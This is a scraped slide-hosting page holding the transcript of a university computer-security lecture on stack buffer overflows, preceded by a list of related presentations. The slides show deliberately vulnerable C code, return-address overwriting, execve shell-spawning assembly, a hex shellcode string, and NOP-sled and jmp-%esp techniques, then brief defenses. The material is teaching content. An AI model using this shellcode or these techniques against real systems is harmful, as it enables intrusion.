Lecture 9: Buffer Overflow*

Slides:

Advertisements

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Advertisements

Smashing the Stack for Fun and Profit

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Buffer Overflows By Tim Peterson Joel Miller Dan Block.

Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Buffer Overflow. Process Memory Organization.

Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

Understand stack Buffer overflow attack and defense Controls against program threats.

Buffer Overflow Computer Organization II 1 © McQuain Buffer Overflows Many of the following slides are based on those from Complete Powerpoint.

CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg

Mitigation of Buffer Overflow Attacks

Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.

1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

Automatic Diagnosis and Response to Memory Corruption Vulnerabilities Presenter: Jianyong Dai Jun Xu, Peng Ning, Chongkyung Kil, Yan Zhai, Chris Bookhot.

University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.

Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Smashing the Stack Overview The Stack Region Buffer Overflow

Buffer Overflows Many of the following slides are based on those from

Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.

Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,

Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Buffer Overflow Proofing of Code Binaries By Ramya Reguramalingam Graduate Student, Computer Science Advisor: Dr. Gopal Gupta.

Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.

Lecture 9: Buffer Ovefflows and ROP EEN 312: Processors: Hardware, Software, and Interfacing Department of Electrical and Computer Engineering Spring 2014,

Introduction to Information Security ROP – Recitation 5.

Carnegie Mellon 1 Bryant and O’Hallaron, Computer Systems: A Programmer’s Perspective, Third Edition Machine-Level Programming V: Unions and Memory layout.

Buffer overflow attack Taeho Oh

Software Vulnerabilities and Exploits

Buffer Overflow Attack- proofing of Code Binaries Ramya Reguramalingam Gopal Gupta Gopal Gupta Department of Computer Science University of Texas at Dallas.

November 2008Buffer Overflow1 King Mongkut’s University of Technology Faculty of Information Technology Network Security Winter 2008 Prof. Reuven Aviv.

CSC 382: Buffer OverflowsSlide #1 Topics 1.What is a Buffer Overflow? 2.The Most Common Implementation Flaw. 3.Process Memory Layout. 4.The Stack and C’s.

Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security.

Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.

CS 3214 Computer Systems Godmar Back Lecture 7. Announcements Stay tuned for Project 2 & Exercise 4 Project 1 due Sep 16 Auto-fail rule 1: –Need at least.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.

Introduction to Information Security

Buffer Overflow By Collin Donaldson.

Mitigation against Buffer Overflow Attacks

Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.

CS 177 Computer Security Lecture 9

Webserver w/user threads

Introduction to Information Security

The Hardware/Software Interface CSE351 Winter 2013

Secure Programming Dr. X

Machine-Level Programming V: Unions and Memory layout

Introduction to Information Security

CSC 495/583 Topics of Software Security Stack Overflows (2)

CMSC 414 Computer and Network Security Lecture 21

Foundations of Network and Computer Security

Smashing the Stack for Fun and Profit

Machine Level Representation of Programs (IV)

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.

Week 2: Buffer Overflow Part 2.

Foundations of Network and Computer Security

Lecture 10: Usable Security

Instructors: Majd Sakr and Khaled Harras

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.

Understanding and Preventing Buffer Overflow Attacks in Unix

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.

Return-to-libc Attacks

Presentation transcript:

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall 2010 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov

Lecture 9 - Buffer Overflow Course Admin Mid-terms graded 392 average: 48 6813: 70 HW4 solution to be posted HW4 to be graded HW5 will be posted very soon 1/1/2019 Lecture 9 - Buffer Overflow

Why study buffer overflow? Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, etc. We’ll focus upon static buffer overflow vulnerabilities 1/1/2019 Lecture 9 - Buffer Overflow

Recall the Security Life Cycle Threats Which stage? Policy Specification Design Implementation Operation and Maintenance 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow How Computer Works There is a processor that interfaces with various devices Processor executes instructions Add, sub, mult, jump and various functions 1/1/2019 Lecture 9 - Buffer Overflow

Where to get the instructions from Each process “thinks” that it has 4GB (2^32) of (virtual) memory (assuming 32-bit processor) Instructions are loaded into the memory Processor fetches and executes these instructions one by one How does the processor know where to return back after “jumping” and after returning from a function 1/1/2019 Lecture 9 - Buffer Overflow

Process Memory Organization 1/1/2019 Lecture 9 - Buffer Overflow

Process Memory Organization 1/1/2019 Lecture 9 - Buffer Overflow

Process Memory Organization 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Function Calls 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Function Calls 1/1/2019 Lecture 9 - Buffer Overflow

Buffer Overflow: Example void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Buffer Overflows 1/1/2019 Lecture 9 - Buffer Overflow

Modifying the Execution Flow void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); } 1/1/2019 Lecture 9 - Buffer Overflow

Modifying the Execution Flow 1/1/2019 Lecture 9 - Buffer Overflow

Modifying the Execution Flow 1/1/2019 Lecture 9 - Buffer Overflow

Modifying the Execution Flow 1/1/2019 Lecture 9 - Buffer Overflow

Modifying the Execution Flow 1/1/2019 Lecture 9 - Buffer Overflow

Exploiting Overflows- Smashing the Stack So, we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it 1/1/2019 Lecture 9 - Buffer Overflow

Exploiting Overflows- Smashing the Stack Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it 1/1/2019 Lecture 9 - Buffer Overflow

Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! 1/1/2019 Lecture 9 - Buffer Overflow

Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Spawning a Shell #include <stdio.h> #include <stdlib.h> void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); } <gdb> disassemble main 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Spawning a Shell void main() {__asm__(" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx call -0x2f .string \"/bin/sh\" "); } <bdb> x/bx <main+1> and so on…… 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Spawning a Shell char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow How to find Shellcode Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow How to find Shellcode 2. Pad shellcode with NOP’s then guess - we don’t need to be exactly on - much more efficient 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Can we do better? If we can find the address where SP points to, we are home 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Can we do better? Find out what shared libaries are being used by the vulnerable program Use ldd command This also provides the starting address where the shared libraries are stored in process’s memory Find out where in the shared library the instruction jmp *%esp occurs Add this to the starting address of the shared library At %esp, store the instruction jmp –constant offset 1/1/2019 Lecture 9 - Buffer Overflow

Consider the simple program 1/1/2019 Lecture 9 - Buffer Overflow

Stack Contents – Normal Execution 1/1/2019 Lecture 9 - Buffer Overflow

Stack Contents – buffer overflow 1/1/2019 Lecture 9 - Buffer Overflow

How to prevent buffer overflows Programmer level: Check the length of the input Use functions strncpy (instead of strcpy) OS level: Techniques such as address space layout randomization 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow References Smashing the Stack for Fun and Profit: http://doc.bughunter.net/buffer-overflow/smash-stack.html Smashing the Modern Stack for Fun and Profit: http://netsec.cs.northwestern.edu/media/readings/modern_stack_smashing.pdf 1/1/2019 Lecture 9 - Buffer Overflow

Lecture 9 - Buffer Overflow Announcement CS6903: Modern Cryptography, Spring 2011, Wednesdays 5:30-8pm http://cis.poly.edu/~nsaxena/docs/crypto-outline.pdf 1/1/2019 Lecture 9 - Buffer Overflow